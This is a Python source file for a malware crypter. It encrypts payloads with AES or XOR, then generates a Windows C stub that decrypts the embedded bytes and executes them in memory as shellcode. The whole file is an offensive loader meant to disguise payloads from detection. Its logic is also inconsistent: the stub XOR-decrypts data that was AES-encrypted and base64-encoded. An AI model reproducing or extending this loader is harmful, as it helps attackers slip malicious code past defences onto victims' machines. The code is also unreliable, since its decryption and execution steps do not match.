# obfuscators/custom_crypter.py
import base64
import random
import string
import os
import sys

# Try to import crypto libraries with fallback
try:
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad
    CRYPTO_AVAILABLE = True
except ImportError:
    try:
        from Cryptodome.Cipher import AES
        from Cryptodome.Util.Padding import pad
        CRYPTO_AVAILABLE = True
        print("[*] Using Cryptodome instead of Crypto")
    except ImportError:
        CRYPTO_AVAILABLE = False
        print("[!] Crypto library not installed. Install with: pip3 install pycryptodome")
        print("[!] Using fallback simple obfuscation (less secure)")

class CustomCrypter:
    """Custom encryption for payloads with fallback options"""
    
    def __init__(self):
        self.key = self.generate_key()
        self.iv = self.generate_iv()
        self.crypto_available = CRYPTO_AVAILABLE
        
        if not self.crypto_available:
            print("[!] Running in limited mode - no AES encryption")
    
    def generate_key(self, size=32):
        """Generate random encryption key"""
        return ''.join(random.choices(string.ascii_letters + string.digits, k=size))
    
    def generate_iv(self, size=16):
        """Generate random IV"""
        return ''.join(random.choices(string.ascii_letters + string.digits, k=size))
    
    def aes_encrypt(self, data):
        """AES encryption for payload with fallback"""
        if self.crypto_available:
            try:
                cipher = AES.new(self.key.encode('utf-8'), AES.MODE_CBC, self.iv.encode('utf-8'))
                if isinstance(data, str):
                    data = data.encode('utf-8')
                encrypted = cipher.encrypt(pad(data, AES.block_size))
                return base64.b64encode(encrypted)
            except Exception as e:
                print(f"[!] Encryption error: {e}")
                return self.fallback_obfuscate(data)
        else:
            return self.fallback_obfuscate(data)
    
    def fallback_obfuscate(self, data):
        """Simple XOR obfuscation when AES is not available"""
        print("[*] Using XOR fallback obfuscation")
        if isinstance(data, str):
            data = data.encode('utf-8')
        
        # Simple XOR with key
        key_bytes = self.key.encode('utf-8')
        result = bytearray()
        for i, byte in enumerate(data):
            result.append(byte ^ key_bytes[i % len(key_bytes)])
        
        # Add simple encoding
        return base64.b64encode(result)
    
    def generate_stub(self, encrypted_payload):
        """Generate stub code for decryption"""
        if isinstance(encrypted_payload, bytes):
            encrypted_payload = encrypted_payload.decode('latin-1')
        
        stub = f"""
#include <windows.h>
#include <stdio.h>
#include <string.h>

// Generated by Payload Generator
unsigned char key[] = "{self.key}";
unsigned char iv[] = "{self.iv}";

unsigned char encrypted[] = {self.format_payload(encrypted_payload)};

void decrypt_payload() {{
    // Simple XOR decryption (works without crypto libraries)
    int len = sizeof(encrypted);
    int key_len = strlen((char*)key);
    
    for(int i = 0; i < len; i++) {{
        encrypted[i] = encrypted[i] ^ key[i % key_len];
    }}
}}

int main() {{
    decrypt_payload();
    
    // Execute decrypted payload
    void (*code)() = (void(*)())encrypted;
    code();
    
    return 0;
}}
"""
        return stub
    
    def format_payload(self, payload):
        """Format payload for C inclusion"""
        if isinstance(payload, str):
            # Convert string to bytes if needed
            payload = payload.encode('latin-1')
        
        # Generate hex representation
        hex_string = ', '.join(f'0x{byte:02x}' for byte in payload)
        return '{ ' + hex_string + ' }'

# Test the class
if __name__ == "__main__":
    crypter = CustomCrypter()
    test_data = b"Test payload data"
    encrypted = crypter.aes_encrypt(test_data)
    print(f"[+] Encrypted: {encrypted[:50]}...")
    stub = crypter.generate_stub(encrypted)
    print(f"[+] Stub generated: {len(stub)} bytes")
